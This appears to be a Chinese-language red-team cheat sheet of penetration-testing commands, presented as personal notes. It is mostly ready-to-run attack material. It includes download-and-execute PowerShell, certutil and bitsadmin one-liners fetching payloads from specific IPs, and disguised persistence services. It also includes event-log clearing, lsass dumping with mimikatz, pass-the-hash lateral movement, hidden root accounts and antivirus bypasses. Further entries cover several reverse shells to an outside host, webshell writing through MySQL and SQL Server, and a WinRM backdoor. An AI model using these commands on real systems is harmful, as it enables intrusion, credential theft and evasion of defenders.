分享一些渗透中用到的命令笔记等(持续更新)

2、ms14068 漏洞利用------
mimikatz.exe
exploit::ms14068 /domain:sinosure.com.cn /user:linl /password:123456 /ptt

3、windows 下载命令
certutil -urlcache -split -f http://baidu.com/123.exe c:\windows\temp\123.exe

bitsadmin /transfer n http://baidu.com/cmd.exe C:\test\cmd.exe

Powershell (new-object System.Net.WebClient).DownloadFile('http://baidu.com/cmd.exe','c:\fuck\1.exe');start-process 'c:\fuck\1.exe'

wmic os get /FORMAT:"http://192.168.28.128/evil.xsl"

4、frpc----powershell自动添加启动--
sc create "Windows Power svhost" binpath= "cmd /c start powershell.exe -nop -w hidden -c \"c:\windows\svhost.exe -c c:\windows\sv.ini""

5、1 frp配置(带密码，改frpc.ini ip即用,socks5代理端口10017)
frps:
[common]
bind_addr = 0.0.0.0
bind_port = 7002
[http_proxy]
type = tcp
remote_port=10017
plugin = socks5
plugin_user = admin
plugin_passwd = test9988

frpc：
[common]
server_addr = xx.xx.xx.xx
server_port = 7002
[cttic_s5]
type = tcp
remote_port = 10017
plugin = socks5
plugin_user = admin
plugin_passwd = test9988

-----------
6、cs 添加powershell启动

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://140.143.7.170:8080/a'))"
添加自动启动服务
sc create "Windows Power" binpath= "cmd /c start powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://140.143.7.170:8080/a))\""

7、清理系统日志-命令行下------和运维做斗争

wevtutil cl security

wevtutil cl system

wevtutil cl application

8、查看防火墙策略详细日志
netsh advfirewall consec show

9、查看详细的进程
wmic process get caption,commandline,processid /value
查看单独的进程
wmic process where caption="chrome.exe" get caption,commandline /value

10、添加路由表
route ADD 140.143.7.0 mask 255.255.255.0 10.210.145.254

11、导出
Get-ADuser -searchbase ' ou=xxx公司,dc=sinosure,dc=com,dc=cn ' -filter * -Properties * | Select-Object Name,sAMAccountName, lastLogondate | Export-CSV c:\Accoun.csv -NoTypeInformation -Encoding UTF8

12、远程关机 域控
Invoke-Command -ScriptBlock {stop-computer} -ComputerName shaanxi_hexn

13、BIG-IP® Configuration Utility F5 Networks, Inc.默认密码
admin/admin ssh root/default

14、PsExec内网横向
获取交互式窗口
PsExec.exe \\127.0.0.1 -u administrator -p 123456 -s cmd
打开远程文件
PsExec.exe \\127.0.0.1 -u administrator -p 123456 -c c:\srm.exe
无交互式
PsExec.exe \\127.0.0.1 -u administrator -p 123456 -s command
Hash传递执行命令
PsExec.exe Administrator@127.0.0.1 whoami -hashes AAD3B435B51404EEAAD3B435B51404EE:880FDF4355DBB26715EA2DF2C408664E
配合msf，hash传递注入
PsExec.exe Administrator@127.0.0.1 -c d:\windows.exe -hashes AAD3B435B51404EEAAD3B435B51404EE:880FDF4355DBB26715EA2DF2C408664E
---------------------
15、nc 监听端口
nc -lvvp 10086
结合msf
use exploit/multi/handler
set payload windows/x64/shell_reverse_tcp
set LHOST 192.168.15.131
set LPORT 4444
exploit

16、在防火墙放行一个端口
netsh firewall add portopening TCP 444 “VMWARE” ENABLE ALL

17、此命令可以帮我们一建开启远程桌面，并帮我们关闭防火墙
run post/windows/manage/enable_rdp

18、导出lsass进程离线读密码
下载procdump64.exe
执行
procdump64.exe-accepteula-malsass.exe 1.dmp
然后将1.dmp下载到本地
mimikatz_2.1_64.exe "sekurlsa::minidump 1.dmp" "sekurlsa::logonPasswords full" exit

19、centos 无交互添加账号密码
linux

第一步，生成你想要的密文密码。
终端敲入命令：perl -e 'print crypt("password","\$6\$saltsalt\$") . "\n"'
第二步，一句话添加root级用户命令。
比如，我设的密码为123456，salt随便选择rGGPt2Zu，算法选择，sha1-512，那么通过第一步的命令得到密文为：tNb2jnSX/XuDRevtLrpcffVen8WzF2bYOPbUK9AYzuzL3gH/GiCvXO8BKjDktdPHT0GpH2DBiZVPStF.hBUHW.
一句话命令就是：
useradd -p \$6\$rGGPt2Zu\$tNb2jnSX/XuDRevtLrpcffVen8WzF2bYOPbUK9AYzuzL3gH/GiCvXO8BKjDktdPHT0GpH2DBiZVPStF.hBUHW. admin -o -u 0 -g root -m -s /bin/bash -d /usr/bin/admin
最后，就生成了root级的账户 admin，和密码 123456。

使用useradd name
使用passwd name 为用户name设置密码
编辑/etc/sudoers ，将该用户添加上去 ， 编辑该文件之前先使用 chmod u+w /etc/sudoers 打开权限
在/etc/sudoers 中添加一行 name ALL=(ALL) ALL
记得收回写权限： chmod u-w /etc/sudoers
18-1另外一个方法：
password="123"
pass=$(perl -e 'print crypt($ARGV[0], "password")' $password)
useradd -m -p $pass test
创建一个test用户 并设置密码为123

20、lcx 转发端口
webshell里执行
1. lcx.exe -slave 117.21.173.97 5115 127.0.0.1 3389

自己的公网肉鸡cmd里面执行
2. lcx.exe -listen 5115 33891

21、ms_17010 配合nc
use exploit/multi/handler
set payload windows/x64/shell_reverse_tcp
set LHOST 192.168.15.131
set LPORT 4444
exploit

21、mstsc远程终端强制登录，有时候提示不符合的证书也可以
mstsc /admin /v:10.1.95.101

22、cmd下导出目录结构与文件tree&&dir
dir /s /b >dir.txt
C:\Windows\Web\RDWeb\Pages\images\ tree /F /s /b >C:\Windows\Web\RDWeb\Pages\images\user.txt

23、sunos&&linux 有关
查看进程 /usr/ucb/ps -aux
ping命令 ping -s -c 3 114.114.114.114
查看dns cat /etc/resolv.conf
查看系统版本 uname -a
查看什么32&64位
使用isainfo -v命令

如果是运行在32位模式下, 则有如下输出：
32-bit sparc applications
如果是运行在64位模式下, 则有如下输出：
64-bit sparcv9 applications
32-bit sparc applications

24、docker未授权访问
docker -H tcp://10.1.191.x:2375 images
docker -H tcp://10.1.191.x:2375 ps -a
docker -H tcp://10.1.191.x:2375 strat dc6ef823f14d
docker -H tcp://10.1.191.x:2375 attach dc6ef823f14d

25、ssh 转发端口到外网
待研究和补充

26、hydra 爆破
hydra -L /root/Desktop/po/name.txt -P /root/Desktop/po/password.txt -M /root/Desktop/po/test.txt -o /root/Desktop/po/crack.txt -e ns －t 20 ssh
(-e ns 测试空口令、把用户当作密码来测试 -t 20 线程)
hydra -C /root/Desktop/po/字典用户名: 密码.txt -M /root/Desktop/po/test.txt -o /root/Desktop/po/crack.txt -e ns －t 20 ssh

27、用python启一个web下载
python -m SimpleHTTPServer
Python3 -m http.server

28、图片马合成
copy 1.png /b + 1.txt /a 2.png

29、linux给普通用户添加登录权限
1.adduser username
2.passwd username
3.可以在/etc/ssh/sshd_config中增加AllowUsers:username

30.修改端口情况下查看RDP端口
tasklist /svc | findstr "termService"
netstat -aon |findstr "1632"

31、curl上传到ftp
curl -T /root/poc.tar.gz -u user:pass ftp://127.0.0.1:21/

32、phpmyadmin查找物理路径
select @@basedir

33、绕过杀软添加windows用户
cmd /c copy c:/windows/system32/net1.exe add.exe&add.exe user smb P@ssw0rd /add&add.exe localgroup administrators smb /add

34.cs参数污染创建用户
argue net1 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Argue
execute net1 user hack Root111! /add
execute net1 localgroup administrators hack /add

35.cs内存加载.net程序（绕过杀软）
execute-assembly /Users/xxx/123.exe

36.PE2HTML.exe 后门（通过转换exe文件类型如：html、pdf实现上线）
PE2HTML.exe -i clienttest.exe -p html
cmd /c clienttest.html

37.cmd查看单独的进程
wmic process where caption="chrome.exe" get caption,commandline /value

38.添加路由表
route ADD 8.8.8.0 mask 255.255.255.0 10.10.10.254

39.cmd查看防火墙策略详细日志
netsh advfirewall consec show rule

40.NPS代理使用
对于linux|darwin sudo nps start

对于windows，管理员身份运行cmd，进入程序目录 nps.exe start

安装后windows配置文件位于 C:\Program Files\nps，linux和darwin位于/etc/nps
修改C:\Program Files\nps\conf\nps.conf 39、40、41行
配置服务器ip、和web控制台账号密码即可

41. WMIHACKER横向（PsExec拦截情况下绕过杀软）
Cmd情况下执行
有命令回显执行方式

`> cscript WMIHACKER_0.6.vbs /cmd 172.16.94.187 administrator "Password!" "systeminfo" 1`

无命令回显

`> cscript WMIHACKER_0.6.vbs /cmd 172.16.94.187 administrator "Password!" "systeminfo > c:\1.txt" 0`

模拟shell模式

`> cscript WMIHACKER_0.6.vbs /shell 172.16.94.187 administrator "Password!" `

文件上传-复制本机calc.exe到远程主机c:\calc.exe

`> cscript wmihacker_0.4.vbe /upload 172.16.94.187 administrator "Password!" "c:\windows\system32\calc.exe" "c:\calc"`

文件下载-下载远程主机calc.exe到本地c:\calc.exe

`> cscript wmihacker_0.4.vbe /download 172.16.94.187 administrator "Password!" "c:\calc" "c:\windows\system32\calc.exe" `

42.reGeorg正向代理脚本(python2)
python reGeorg.py -u http://www.baidu.com/123.php -p 1018
再使用代理工具去连接本地的1018端口，代理模式为socks5

43.Neo-reGeorg正向代理脚本(python3)
python3 neoreg.py generate -k password 生成脚本密码
python3 neoreg.py -k password -u http://xx/tunnel.php -p 1018 建立socks5连接

44.Procdump从内存获取windows明文密码
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
把lsass.dmp放在mimikatz目录利用
sekurlsa::minidump lsass.dmp
sekurlsa::minidump logonPasswords full

45.常见的几个反弹shell方式
bash -i >& /dev/tcp/183.67.60.167/443 0>&1
sh -i >& /dev/udp/183.67.60.167/443 0>&1
exec /bin/sh 0&0 2>&0
nc -e /bin/sh 183.67.60.167 443
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("183.67.60.167",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

46.echo写马
windows
echo ^ > 1.php
linux
echo "" > 1.php

47.OneForAll子域名收集（python3）
Python3 oneforall.py --target baidu.com run

48.蜜罐特征（持续记录）
默安幻阵（record.js）body="document[__Ox3f21b[0xd]](__Ox3f21b"
长亭画像（portrait.js）body="password"
HFish（x.js）body="sec_key"

49.sqlserver xp_cmdshell执行命令
打开xp_cmdshell
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
执行命令
exec xp_cmdshell 'whoami'

50.sqlserver SP_OACREATE无回显命令
打开SP_OACREATE
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'Ole Automation Procedures', 1;
RECONFIGURE WITH OVERRIDE;
执行命令
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c whoami >d:\\temp\\1.txt'

51.mysql写webshell
select "" INTO OUTFILE "D:\\WWW\\22.php"
绕过secure-file-priv
1.启用慢查询日志
set global slow_query_log=1;
2.修改slow_query_log_file日志文件的绝对路径
set global slow_query_log_file='D:\\WWW\123.php'
3.写入shell
select '' or sleep(10);

52.mysql udf提权
将dll文件复制到mysql的/lib/plugin目录下，执行sql语句
create function sys_exec returns string soname "lib_mysqludf_sys.dll";
执行命令
select sys_exec('whoami');

53.cs powershell免杀上线
cmd /c echo IEX ((new-object net.webclient).downloadstring('http://127.0.0.1:7788/a')) | powershell -

54.HTTP.SYS无文件后门维持windows权限
1.开启WINRM服务
只需要一条命令即可
winrm quickconfig -q
2.新增80端口Listener
执行：winrm set winrm/config/service @{EnableCompatibilityHttpListener="true"}
3.后门连接使用
在本机开启WINRM服务
此时运行CMD需要使用管理者身份运行，不然会出现权限不够
winrm quickconfig -q # 开启服务
winrm set winrm/config/Client @{TrustedHosts="*"} # 设置信任连接的主机为所有
然后直接使用winrs命令连接远程WinRM服务即可执行命令
winrs -r:http://127.0.0.1 -u:administrator -p:password whoami